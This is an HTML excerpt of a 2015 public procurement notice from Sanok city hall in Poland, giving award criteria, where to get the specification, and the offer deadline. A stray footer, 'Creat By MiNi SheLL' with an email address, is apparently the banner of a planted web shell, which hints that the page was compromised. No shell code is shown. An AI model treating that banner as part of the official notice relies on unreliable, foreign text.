<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Parametry techniczne - 3</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.um.sanok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Sanoka
ul. Rynek 1
38-500 Sanok.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.03.2015 godzina 10:00, miejsce: Urząd Miasta Sanoka
ul. Rynek 1
38-500 Sanok.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com